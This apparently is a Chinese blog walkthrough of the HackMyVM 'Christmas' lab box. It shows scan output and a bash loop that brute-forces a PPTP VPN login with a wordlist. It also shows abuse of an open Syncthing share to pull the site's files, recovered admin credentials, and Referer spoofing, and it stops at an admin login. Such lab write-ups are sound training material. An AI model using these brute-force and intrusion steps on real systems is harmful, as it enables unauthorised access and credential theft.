{"id":489,"date":"2024-04-02T20:20:26","date_gmt":"2024-04-02T12:20:26","guid":{"rendered":"http:\/\/162.14.82.114\/?p=489"},"modified":"2024-04-02T20:22:55","modified_gmt":"2024-04-02T12:22:55","slug":"hmv-_-christmas","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/489\/04\/02\/2024\/","title":{"rendered":"hmv[-_-]Christmas"},"content":{"rendered":"

Christmas<\/h1>\n

\"image-20240402152533182\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
rustscan -a 172.20.10.3 -- -A <\/code><\/pre>\n
PORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n80\/tcp   open  http    syn-ack Apache httpd 2.4.57 ((Debian))\n| http-robots.txt: 4 disallowed entries \n|_\/ \/webid \/images \/assets\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-title: Massively by HTML5 UP\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n1723\/tcp open  pptp    syn-ack linux (Firmware: 1)\nService Info: Host: local; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
feroxbuster -u http:\/\/172.20.10.3<\/code><\/pre>\n
200      GET     1250l     7663w   569797c http:\/\/172.20.10.3\/images\/pic07.jpg\n200      GET     1277l     7610w   570745c http:\/\/172.20.10.3\/images\/pic02.jpg\n200      GET      897l     4455w   349519c http:\/\/172.20.10.3\/images\/pic04.jpg\n404      GET        9l       31w      273c http:\/\/172.20.10.3\/assets\/js\/assets\n200      GET        2l     1294w    89501c http:\/\/172.20.10.3\/assets\/js\/jquery.min.js\n200      GET        2l       87w     2439c http:\/\/172.20.10.3\/assets\/js\/breakpoints.min.js\n200      GET        2l       23w      831c http:\/\/172.20.10.3\/assets\/js\/jquery.scrolly.min.js\n200      GET        2l       52w     2051c http:\/\/172.20.10.3\/assets\/js\/browser.min.js\n200      GET       46l      104w     1114c http:\/\/172.20.10.3\/assets\/sass\/noscript.scss\n404      GET        9l       31w      273c http:\/\/172.20.10.3\/assets\/sass\/assets\n200      GET      213l      409w     3720c http:\/\/172.20.10.3\/assets\/sass\/base\/_typography.scss\n404      GET        9l       31w      273c http:\/\/172.20.10.3\/assets\/sass\/base\/assets\/\n200      GET       76l      210w     1569c http:\/\/172.20.10.3\/assets\/sass\/base\/_reset.scss\n404      GET        9l       31w      273c http:\/\/172.20.10.3\/assets\/sass\/base\/assets\/sass\n200      GET       48l      117w     1003c http:\/\/172.20.10.3\/assets\/sass\/base\/_page.scss\n404      GET        9l       31w      273c http:\/\/172.20.10.3\/assets\/sass\/components\/assets\/\n200      GET      153l      308w     3350c http:\/\/172.20.10.3\/assets\/sass\/layout\/_navPanel.scss\n200      GET       33l       66w      482c http:\/\/172.20.10.3\/assets\/sass\/components\/_icon.scss\n200      GET      158l      318w     2963c http:\/\/172.20.10.3\/assets\/sass\/layout\/_main.scss\n404      GET        9l       31w      273c http:\/\/172.20.10.3\/assets\/sass\/layout\/assets\/sass\n403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301      GET        9l       28w      311c http:\/\/172.20.10.3\/images => http:\/\/172.20.10.3\/images\/\n200      GET      222l      705w     8958c http:\/\/172.20.10.3\/index.php\n200      GET       35l      388w    21736c http:\/\/172.20.10.3\/images\/pic09.jpg\n301      GET        9l       28w      311c http:\/\/172.20.10.3\/assets => http:\/\/172.20.10.3\/assets\/\n200      GET     4689l     9230w    84145c http:\/\/172.20.10.3\/assets\/css\/main.css\n200      GET      126l      542w     5909c http:\/\/172.20.10.3\/generic.php\n200      GET      227l     1027w    84039c http:\/\/172.20.10.3\/images\/pic06.jpg\n200      GET      240l     1553w   135811c http:\/\/172.20.10.3\/images\/pic01.jpg\n200      GET     1556l     8912w   768128c http:\/\/172.20.10.3\/images\/pic03.jpg\n200      GET       12l       46w     5286c http:\/\/172.20.10.3\/images\/overlay.png\n200      GET     2005l    12842w  1142518c http:\/\/172.20.10.3\/images\/pic05.jpg\n200      GET      258l      507w     5346c http:\/\/172.20.10.3\/assets\/js\/main.js\n302      GET        9l       26w      291c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET    28815l   179126w 11593919c http:\/\/172.20.10.3\/images\/bg.jpg\n200      GET       71l      144w     1743c http:\/\/172.20.10.3\/assets\/sass\/main.scss\n200      GET       35l       74w      724c http:\/\/172.20.10.3\/assets\/sass\/components\/_row.scss\n200      GET       85l      181w     1900c http:\/\/172.20.10.3\/assets\/sass\/layout\/_nav.scss\n200      GET      243l      541w     5147c http:\/\/172.20.10.3\/assets\/sass\/layout\/_footer.scss\n200      GET       47l      438w    22473c http:\/\/172.20.10.3\/images\/pic08.jpg\n200      GET       64l      150w     1569c http:\/\/172.20.10.3\/assets\/sass\/layout\/_wrapper.scss\n200      GET      101l      190w     1788c http:\/\/172.20.10.3\/assets\/sass\/components\/_actions.scss\n200      GET       63l      148w     1648c http:\/\/172.20.10.3\/assets\/sass\/layout\/_header.scss\n200      GET      134l      256w     2690c http:\/\/172.20.10.3\/assets\/sass\/components\/_button.scss\n200      GET      115l      236w     2267c http:\/\/172.20.10.3\/assets\/sass\/layout\/_intro.scss\n200      GET       98l      185w     1499c http:\/\/172.20.10.3\/assets\/sass\/components\/_list.scss\n200      GET      122l      207w     1868c http:\/\/172.20.10.3\/assets\/sass\/components\/_table.scss\n200      GET      293l      589w     5916c http:\/\/172.20.10.3\/assets\/sass\/components\/_form.scss\n200      GET      111l      225w     2312c http:\/\/172.20.10.3\/assets\/sass\/components\/_pagination.scss\n200      GET       52l      103w     1009c http:\/\/172.20.10.3\/assets\/sass\/components\/_icons.scss\n200      GET       34l       77w      618c http:\/\/172.20.10.3\/assets\/sass\/components\/_box.scss\n200      GET      112l      220w     1717c http:\/\/172.20.10.3\/assets\/sass\/components\/_section.scss\n200      GET       92l      162w     1363c http:\/\/172.20.10.3\/assets\/sass\/components\/_image.scss\n200      GET      587l     1232w    12433c http:\/\/172.20.10.3\/assets\/js\/util.js\n200      GET        2l       37w     2257c http:\/\/172.20.10.3\/assets\/js\/jquery.scrollex.min.js\n200      GET       36l       93w      931c http:\/\/172.20.10.3\/assets\/css\/noscript.css\n200      GET       62l      316w    24032c http:\/\/172.20.10.3\/assets\/webfonts\/fa-regular-400.woff2\n200      GET       60l      377w    29443c http:\/\/172.20.10.3\/assets\/webfonts\/fa-regular-400.woff\n301      GET        9l       28w      310c http:\/\/172.20.10.3\/webid => http:\/\/172.20.10.3\/webid\/\n200      GET      101l       83w    59401c http:\/\/172.20.10.3\/assets\/css\/fontawesome-all.min.css\n200      GET      378l     2243w   185256c http:\/\/172.20.10.3\/assets\/webfonts\/fa-solid-900.woff\n200      GET      362l     1830w    40075c http:\/\/172.20.10.3\/assets\/webfonts\/fa-regular-400.eot\n200      GET      362l     1818w    39769c http:\/\/172.20.10.3\/assets\/webfonts\/fa-regular-400.ttf\n200      GET      314l     1692w   139309c http:\/\/172.20.10.3\/assets\/webfonts\/fa-brands-400.woff2\n200      GET      278l     1760w   142008c http:\/\/172.20.10.3\/assets\/webfonts\/fa-solid-900.woff2\n200      GET      326l     1951w   162883c http:\/\/172.20.10.3\/assets\/webfonts\/fa-brands-400.woff\n200      GET     2900l    14901w   234705c http:\/\/172.20.10.3\/assets\/webfonts\/fa-solid-900.eot\n200      GET      223l      664w     4577c http:\/\/172.20.10.3\/assets\/sass\/libs\/_breakpoints.scss\n200      GET       62l      122w     1215c http:\/\/172.20.10.3\/assets\/sass\/libs\/_vars.scss\n200      GET       78l      266w     2218c http:\/\/172.20.10.3\/assets\/sass\/libs\/_mixins.scss\n200      GET      376l      726w     7355c http:\/\/172.20.10.3\/assets\/sass\/libs\/_vendor.scss\n200      GET      338l      835w     7848c http:\/\/172.20.10.3\/assets\/sass\/libs\/_fixed-grid.scss\n200      GET       90l      279w     1957c http:\/\/172.20.10.3\/assets\/sass\/libs\/_functions.scss\n200      GET      149l      322w     2840c http:\/\/172.20.10.3\/assets\/sass\/libs\/_html-grid.scss\n200      GET     1747l     7283w   149607c http:\/\/172.20.10.3\/assets\/webfonts\/fa-brands-400.eot\n200      GET     1748l     7270w   149287c http:\/\/172.20.10.3\/assets\/webfonts\/fa-brands-400.ttf\n200      GET      801l    17193w   144714c http:\/\/172.20.10.3\/assets\/webfonts\/fa-regular-400.svg\n200      GET     2899l    14888w   234411c http:\/\/172.20.10.3\/assets\/webfonts\/fa-solid-900.ttf\n200      GET      498l     1812w    22063c http:\/\/172.20.10.3\/elements.php\n200      GET      222l      705w     8958c http:\/\/172.20.10.3\/\n200      GET     3717l    78495w   747927c http:\/\/172.20.10.3\/assets\/webfonts\/fa-brands-400.svg\n200      GET     5034l   105823w   918991c http:\/\/172.20.10.3\/assets\/webfonts\/fa-solid-900.svg<\/code><\/pre>\n
dirb http:\/\/172.20.10.3<\/code><\/pre>\n
---- Scanning URL: http:\/\/172.20.10.3\/ ----\n==> DIRECTORY: http:\/\/172.20.10.3\/assets\/\n==> DIRECTORY: http:\/\/172.20.10.3\/images\/\n+ http:\/\/172.20.10.3\/index.php (CODE:200|SIZE:8958)\n+ http:\/\/172.20.10.3\/robots.txt (CODE:200|SIZE:79)\n+ http:\/\/172.20.10.3\/server-status (CODE:403|SIZE:276)<\/code><\/pre>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\n
nikto -h http:\/\/172.20.10.3<\/code><\/pre>\n
- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.3\n+ Target Hostname:    172.20.10.3\n+ Target Port:        80\n+ Start Time:         2024-04-02 03:20:37 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.57 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/assets\/: Directory indexing found.\n+ \/robots.txt: Entry '\/assets\/' is returned a non-forbidden or redirect HTTP code (200). See: https:\/\/portswigger.net\/kb\/issues\/00600600_robots-txt-file\n+ \/images\/: Directory indexing found.\n+ \/robots.txt: Entry '\/images\/' is returned a non-forbidden or redirect HTTP code (200). See: https:\/\/portswigger.net\/kb\/issues\/00600600_robots-txt-file\n+ \/robots.txt: contains 4 entries which should be manually viewed. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Glossary\/Robots.txt\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is "127.0.0.1". See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/login.php: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/login.php: Admin login page\/section found.\n+ 8105 requests: 0 error(s) and 11 item(s) reported on remote host\n+ End Time:           2024-04-02 03:20:52 (GMT-4) (15 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n
\u6f0f\u6d1e\u6316\u6398<\/h2>\n
\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n
http:\/\/172.20.10.3\/robots.txt\nUser-agent: *\nDisallow: \/\nDisallow: \/webid\nDisallow: \/images\nDisallow: \/assets<\/code><\/pre>\n
\u53d1\u751f\u8df3\u8f6c\u4e86\uff1a<\/p>\n
http:\/\/christmas.hmv\/login.php<\/code><\/pre>\n
\u6dfb\u52a0hosts\u8bb0\u5f55\uff1a<\/p>\n
172.20.10.3    christmas.hmv<\/code><\/pre>\n
\u518d\u6b21\u8bbf\u95ee\uff1a<\/p>\n
\/webid<\/code><\/pre>\n
\"image-20240402155302006\"<\/div><\/p>\n
\u5f31\u5bc6\u7801\u4e0e\u4e07\u80fd\u5bc6\u7801\u90fd\u4e0d\u884c\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u5176\u4ed6\u529e\u6cd5\uff1a<\/p>\n
\u67e5\u770b\u654f\u611f\u7aef\u53e3<\/h3>\n
1723\/tcp open  pptp    syn-ack linux (Firmware: 1)<\/code><\/pre>\n
\n
1723\/tcp open pptp<\/code> \u8868\u793a\u5728 TCP \u7aef\u53e3 1723 \u4e0a\u68c0\u6d4b\u5230\u4e86\u4e00\u4e2a\u5f00\u653e\u7684\u670d\u52a1\uff0c\u5e76\u4e14\u8fd9\u4e2a\u670d\u52a1\u88ab\u8bc6\u522b\u4e3a pptp<\/code>\u3002<\/p>\n
pptp<\/code> \u662f Point-to-Point Tunneling Protocol \u7684\u7f29\u5199\uff0c\u5b83\u662f\u4e00\u79cd\u7528\u4e8e\u5728 IP \u7f51\u7edc\u4e0a\u5efa\u7acb\u70b9\u5bf9\u70b9\u8fde\u63a5\u7684\u96a7\u9053\u534f\u8bae\u3002\u5b83\u5e38\u7528\u4e8e\u8fdc\u7a0b\u8bbf\u95ee\u548c VPN\uff08\u865a\u62df\u79c1\u4eba\u7f51\u7edc\uff09\u89e3\u51b3\u65b9\u6848\uff0c\u5c24\u5176\u662f\u5f53\u5ba2\u6237\u7aef\u4e0e\u670d\u52a1\u5668\u4e4b\u95f4\u9700\u8981\u8fdb\u884c PPP\uff08Point-to-Point Protocol\uff09\u4f1a\u8bdd\u65f6\u3002<\/p>\n
\u5728\u65e9\u671f\u7684\u7f51\u7edc\u73af\u5883\u4e2d\uff0cPPTP \u662f\u4e00\u79cd\u6d41\u884c\u7684\u8fdc\u7a0b\u8bbf\u95ee\u534f\u8bae\uff0c\u56e0\u4e3a\u5b83\u76f8\u5bf9\u7b80\u5355\u5e76\u4e14\u6613\u4e8e\u8bbe\u7f6e\u3002\u7136\u800c\uff0c\u968f\u7740\u65f6\u95f4\u7684\u63a8\u79fb\uff0c\u7531\u4e8e\u5176\u5b89\u5168\u6027\u7684\u95ee\u9898\uff0cPPTP \u9010\u6e10\u88ab\u66f4\u5b89\u5168\u7684\u534f\u8bae\u5982 OpenVPN\u3001L2TP\/IPsec \u548c SSTP \u6240\u66ff\u4ee3\u3002<\/p>\n<\/blockquote>\n
pptp\u8fde\u63a5\u8fdc\u7a0b\u670d\u52a1<\/h3>\n
\u6ca1\u6709\u5b89\u88c5\u7684\u8bb0\u5f97\u5b89\u88c5\u4e00\u4e0b\uff0c\u6211\u81ea\u5e26\u4e86\u4e0d\u77e5\u9053\u4e3a\u5565\uff1a<\/p>\n
sudo apt-get install pptp-linux -y<\/code><\/pre>\n
\u5c1d\u8bd5\u8fde\u63a5\u670d\u52a1<\/h4>\n
mkdir christmas\ncd christmas\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/christmas]\n\u2514\u2500$ pptpsetup --create vpn --server christmas.hmv --username admin --password password --encrypt --start\n\/usr\/sbin\/pptpsetup: can't write to '\/etc\/ppp\/chap-secrets': Permission denied\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/christmas]\n\u2514\u2500$ sudo pptpsetup --create vpn --server christmas.hmv --username admin --password password --encrypt --start<\/code><\/pre>\n
pptpsetup --create <TUNNEL> --server <SERVER> [--domain <DOMAIN>]\n          --username <USERNAME> [--password <PASSWORD>]\n          [--encrypt] [--start]<\/code><\/pre>\n
\u4f46\u662f\u4f1a\u51fa\u73b0\u8ba4\u8bc1\u5931\u8d25\uff1a<\/p>\n
Using interface ppp0\nConnect: ppp0 <--> \/dev\/pts\/4\nMS-CHAP authentication failed: Access denied\nCHAP authentication failed\nModem hangup\nConnection terminated.<\/code><\/pre>\n
\u7206\u7834vpn<\/h3>\n
\u8fd9\u662f\u5f88\u6b63\u5e38\u7684\uff0c\u56e0\u4e3a\u6211\u4eec\u4e0d\u77e5\u9053\u8d26\u53f7\u5bc6\u7801\uff0c\u4f7f\u7528rockyou<\/code>\u5b57\u5178\u5c1d\u8bd5\u7206\u7834vpn<\/code>\uff0c\u4f7f\u7528\u5f31\u7528\u6237\u540dadmin<\/code>\u8fdb\u884c\u5c1d\u8bd5\uff0c<\/p>\n
\u4f7f\u7528kali\u81ea\u5e26\u7684thc-pptp-bruter<\/code>\u4e0d\u80fd\u751f\u6548\uff0c\u4f3c\u4e4e\u53ea\u80fd\u4f7f\u7528shell\u811a\u672c\u8fdb\u884c\u653b\u51fb\u4e86\u3002\u3002<\/p>\n
\u8fd9\u91cc\u76f4\u63a5\u501f\u9274\u4f5c\u8005\u7684brutevpn.sh<\/code>\u811a\u672c\uff0c\u601d\u8def\u5f88\u7b80\u5355\u5c31\u662f\u8bfb\u53d6\u5b57\u5178\u91cd\u590d\u5c1d\u8bd5\u547d\u4ee4\uff0c\u53ef\u4ee5\u7684\u8bdd\u8f93\u51fa\uff0c\u4e0d\u53ef\u4ee5\u7684\u8bdd\u663e\u793a\u6b63\u5728\u4f7f\u7528\u7684payload\uff1a<\/p>\n
while read -r line ; do\n    pptpsetup --create vpn --server christmas.hmv --username admin --password "$line" --encrypt --start &>\/dev\/null\n    echo > \/etc\/ppp\/chap-secrets\n    if ip link show ppp0 &>\/dev\/null ; then\n        echo "[+] Password: $line"\n        exit 0\n    else echo -en "[x] Payload: $line\\r"\n    fi\ndone < wordlists <\/code><\/pre>\n
head -n 100 \/usr\/share\/wordlists\/rockyou.txt > wordlists<\/code><\/pre>\n
\"image-20240402173538200\"<\/div><\/p>\n
\n
\u5982\u679c\u4e0d\u884c\u5c31\u91cd\u542f\u4e00\u4e0b\u3002\u3002\u3002\u3002\u72d7\u5934.jpg<\/p>\n<\/blockquote>\n
\"image-20240402173624037\"<\/div><\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u91cd\u65b0\u770b\u4e00\u4e0b\u7f51\u5361\uff0c\u53d1\u73b0\u591a\u4e86\u4e00\u4e2a\uff1a<\/p>\n
\"image-20240402173855504\"<\/div><\/p>\n
\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
nmap -p 1-65535 192.168.3.1<\/code><\/pre>\n
Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-02 05:42 EDT\nNmap scan report for 192.168.3.1\nHost is up (0.0021s latency).\nNot shown: 65529 closed tcp ports (reset)\nPORT      STATE SERVICE\n21\/tcp    open  ftp\n22\/tcp    open  ssh\n80\/tcp    open  http\n1723\/tcp  open  pptp\n8384\/tcp  open  marathontp\n22000\/tcp open  snapenetio\n\nNmap done: 1 IP address (1 host up) scanned in 7.92 seconds<\/code><\/pre>\n
\u591a\u51fa\u6765\u4e86\u4e24\u4e2a\u7aef\u53e3\uff0c\u5c1d\u8bd5ftp\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
ftp\u8fde\u63a5<\/h3>\n
ftp 192.168.3.1<\/code><\/pre>\n
\u4f7f\u7528\u9ed8\u8ba4\u7684\u8bd5\u8bd5\uff1a<\/p>\n
Anonymous<\/code><\/pre>\n
\u5931\u8d25\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/christmas]\n\u2514\u2500# ftp 192.168.3.1\nConnected to 192.168.3.1.\n220 Welcome to the christmas.hmv FTP server. Please note that the primary FTP directory is located at \/srv\/ftp. All activities on this server are monitored and logged. Ensure compliance with our terms of use. Enjoy your session!\nName (192.168.3.1:kali): Anonymous\n331 Please specify the password.\nPassword: \n530 Login incorrect.\nftp: Login failed\nftp> <\/code><\/pre>\n
\u4f46\u662f\u5b9a\u4f4d\u5230\u4e86\/srv\/ftp<\/code>\uff0c\u5176\u4ed6\u7684\u5f31\u5bc6\u7801\u4f3c\u4e4e\u4e5f\u8fdb\u4e0d\u53bb\u3002<\/p>\n
\u67e5\u770b\u5f00\u653e\u7aef\u53e3<\/h3>\n
\u5f00\u653e\u4e868384\/tcp  open  marathontp AND 22000\/tcp open  snapenetio<\/code><\/p>\n
8384\u7aef\u53e3<\/h4>\n
\"image-20240402175623616\"<\/div><\/p>\n
\n
Syncthing\u662f\u4e00\u4e2a\u5f00\u6e90\u7684\u6587\u4ef6\u540c\u6b65\u5ba2\u6237\u7aef\u4e0e\u670d\u52a1\u5668\u8f6f\u4ef6\uff0c\u91c7\u7528Go\u8bed\u8a00\u7f16\u5199\u3002\u5b83\u53ef\u4ee5\u5728\u672c\u5730\u7f51\u7edc\u4e0a\u7684\u8bbe\u5907\u4e4b\u95f4\u6216\u901a\u8fc7Internet\u5728\u8fdc\u7a0b\u8bbe\u5907\u4e4b\u95f4\u540c\u6b65\u6587\u4ef6\uff0c\u4f7f\u7528\u4e86\u5176\u72ec\u6709\u7684\u5bf9\u7b49\u81ea\u7531\u5757\u4ea4\u6362\u534f\u8bae\u3002Syncthing\u4e0d\u4f9d\u8d56\u4e8e\u96c6\u4e2d\u5f0f\u670d\u52a1\u5668\u6216\u4e91\u5b58\u50a8\u670d\u52a1\uff0c\u800c\u662f\u4f7f\u7528\u70b9\u5bf9\u70b9\u7684\u8fde\u63a5\u65b9\u5f0f\uff0c\u5728\u8bbe\u5907\u4e4b\u95f4\u76f4\u63a5\u8fdb\u884c\u901a\u4fe1\u548c\u540c\u6b65\u6587\u4ef6\uff0c\u4ece\u800c\u63d0\u9ad8\u4e86\u6570\u636e\u7684\u5b89\u5168\u6027\u548c\u9690\u79c1\u6027\u3002\u5b83\u53ef\u4ee5\u5728\u591a\u4e2a\u64cd\u4f5c\u7cfb\u7edf\u4e0a\u8fd0\u884c\uff0c\u5305\u62ecWindows\u3001macOS\u3001Linux\u548cAndroid\uff0c\u4e3a\u7528\u6237\u63d0\u4f9b\u4e86\u5728\u4e0d\u540c\u7c7b\u578b\u7684\u8bbe\u5907\u4e0a\u8fdb\u884c\u6587\u4ef6\u540c\u6b65\u7684\u4fbf\u5229\u3002\u6b64\u5916\uff0cSyncthing\u8fd8\u63d0\u4f9b\u4e86\u4e00\u4e2a\u6613\u4e8e\u4f7f\u7528\u7684Web\u754c\u9762\uff0c\u4f7f\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u6d4f\u89c8\u5668\u76f4\u63a5\u7ba1\u7406\u548c\u76d1\u63a7\u5176\u8bbe\u5907\u548c\u540c\u6b65\u4efb\u52a1<\/p>\n
Syncthing\u7684\u5de5\u4f5c\u539f\u7406\u57fa\u4e8e\u8bbe\u5907\u548c\u6587\u4ef6\u5939\u4e24\u4e2a\u6838\u5fc3\u6982\u5ff5\u3002\u8bbe\u5907\u662f\u6307\u53ef\u4ee5\u8fd0\u884cSyncthing\u8f6f\u4ef6\u7684\u4efb\u610f\u8ba1\u7b97\u673a\u6216\u79fb\u52a8\u8bbe\u5907\uff0c\u6587\u4ef6\u5939\u5219\u662f\u6307\u5728\u4e00\u4e2a\u8bbe\u5907\u4e0a\u6307\u5b9a\u7684\u5171\u4eab\u6587\u4ef6\u5939\uff0c\u5176\u4ed6\u8bbe\u5907\u53ef\u4ee5\u6839\u636e\u9700\u8981\u540c\u6b65\u8be5\u6587\u4ef6\u5939\u4e2d\u7684\u4efb\u610f\u6587\u4ef6\u6216\u5b50\u76ee\u5f55\u3002\u7531\u4e8e\u91c7\u7528\u4e86P2P\u6280\u672f\uff0cSyncthing\u5728\u540c\u6b65\u6570\u636e\u65f6\uff0c\u6570\u636e\u5e76\u4e0d\u4f1a\u4e0a\u4f20\u5230\u67d0\u4e2a\u4e91\u670d\u52a1\u5668\u4e0a\uff0c\u800c\u662f\u76f4\u63a5\u5728\u4f60\u6240\u6307\u5b9a\u7684\u51e0\u4e2a\u8bbe\u5907\u4e4b\u95f4\u4f20\u8f93\uff0c\u5e76\u53ea\u5b58\u50a8\u4e8e\u4f60\u6240\u4fe1\u4efb\u7684\u672c\u5730\u8bbe\u5907\uff0c\u786e\u4fdd\u4e86\u9690\u79c1\u4e0e\u5b89\u5168\u3002<\/p>\n
\u603b\u7684\u6765\u8bf4\uff0cSyncthing\u662f\u4e00\u4e2a\u529f\u80fd\u5f3a\u5927\u3001\u5b89\u5168\u4e14\u79c1\u5bc6\u7684\u6587\u4ef6\u540c\u6b65\u5de5\u5177\uff0c\u9002\u7528\u4e8e\u4e2a\u4eba\u7528\u6237\u548c\u4f01\u4e1a\u7528\u6237\u5728\u4e0d\u540c\u8bbe\u5907\u95f4\u540c\u6b65\u6587\u4ef6\u7684\u9700\u6c42\u3002<\/p>\n<\/blockquote>\n
\u90e8\u7f72\u5e76\u540c\u6b65syncthing<\/h4>\n
\u5728\u672c\u5730\u90e8\u7f72\u4e00\u4e2a\uff0c\u7136\u540e\u5c06ID\u52a0\u8fdb\u53bb\uff0c\u5b9e\u73b0\u4e24\u8fb9ftp\u540c\u6b65\u3002<\/p>\n
sudo apt-get install syncthing <\/code><\/pre>\n
\u542f\u52a8\u4e00\u4e0b\uff1a<\/p>\n
syncthing<\/code><\/pre>\n
\"image-20240402181448887\"<\/div><\/p>\n
\"image-20240402181533828\"<\/div><\/p>\n
ok\uff01\u5728Actions<\/code>\u4e2d\u6709\u6211\u4eec\u7684\u7528\u6237ID\uff0c\u5c1d\u8bd5\u52a0\u5165\u5230\u90a3\u4e2a\u9776\u573a\u7684\u5171\u4eab\u540d\u5355\u4e2d\uff1a<\/p>\n
\"image-20240402181632265\"<\/div><\/p>\n
MAP5NBU-U6CIUEH-FRDHASV-VTATPGY-S4ZYIH5-ZFE3YHF-OIVNLFB-4EPFAQN<\/code><\/pre>\n
\"image-20240402181722741\"<\/div>
\n
\"image-20240402181743769\"<\/div><\/p>\n
\u7136\u540e\u56de\u53bb\u770b\u5230\u6709\u4e00\u4e2a\u8bf7\u6c42\uff1a<\/p>\n
\"image-20240402181906058\"<\/div>
\n
\"image-20240402181926218\"<\/div><\/p>\n
\u70b9\u51fbsave<\/code>\u3002\u7136\u540e\u6dfb\u52a0\u5171\u4eab\u76ee\u5f55\uff0c\u5171\u4eab\u4e0a\u9762\u770b\u5230\u7684ftp\uff1a<\/p>\n
\"image-20240402182123900\"<\/div><\/p>\n
\u7136\u540e\u5171\u4eab\uff1a<\/p>\n
\"image-20240402182224290\"<\/div><\/p>\n
\u8001\u6837\u5b50\uff0c\u540c\u610f\u3002<\/p>\n
\"image-20240402182307549\"<\/div><\/p>\n
ftp\u8fde\u63a5<\/h3>\n
\u7136\u540e\u6211\u4eec\u56de\u5934\u770b\u4e00\u4e0b\u662f\u5426\u771f\u7684\u5171\u4eab\u8fc7\u6765\u4e86\uff1a<\/p>\n
\"image-20240402182418631\"<\/div><\/p>\n
ok\uff0c\u5c1d\u8bd5unzip<\/code>\u89e3\u538b\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/christmas\/ftp]\n\u2514\u2500# ls\nassets  backup.zip  elements.php  generic.php  images  index.php  login.php  robots.txt<\/code><\/pre>\n
\u5728login.php<\/code>\u4e2d\u53d1\u73b0\uff1a<\/p>\n
\"image-20240402182627651\"<\/div><\/p>\n
\u53d1\u73b0\u8d26\u53f7\u5bc6\u7801\u4e86\uff01<\/p>\n
admin\nMyPassword1@2023*<\/code><\/pre>\n
\u767b\u5f55<\/h3>\n
\u62ff\u8d26\u53f7\u5bc6\u7801\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\"image-20240402182828273\"<\/div><\/p>\n
\u51fa\u73b0\uff1a<\/p>\n
http:\/\/christmas.hmv\/2fa.php<\/code><\/pre>\n
\"image-20240402182844305\"<\/div><\/p>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u90a3\u4e2awebid<\/code>\uff0c\u53d1\u73b0\u5b83\u4f1a\u8df3\u8f6c\u5230\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u89c4\u5b9a\u662f\u4ece\u767b\u5f55\u4ee5\u540e\u7684\u754c\u9762\u8fdb\u53bb\u7684\uff0c\u5373\u4fee\u6539Referer<\/code><\/p>\n
\"image-20240402192250568\"<\/div><\/p>\n
\u7136\u540e\u65e0\u610f\u95f4\u53d1\u73b0\uff1a<\/p>\n
\"image-20240402183835454\"<\/div><\/p>\n
\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2awebid\u662f\u5565\uff1a\uff08\u6216\u8005\u641crobots.txt\u7684\u5185\u5bb9\uff09<\/p>\n
\u627e\u5230\u4e86\uff1ahttps:\/\/github.com\/renlok\/WeBid<\/a><\/p>\n
\u53d1\u73b0\u5b58\u5728\u7ba1\u7406\u5458\u767b\u5f55\u9875\u9762\uff1a<\/p>\n
\"image-20240402184201672\"<\/div><\/p>\n
\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
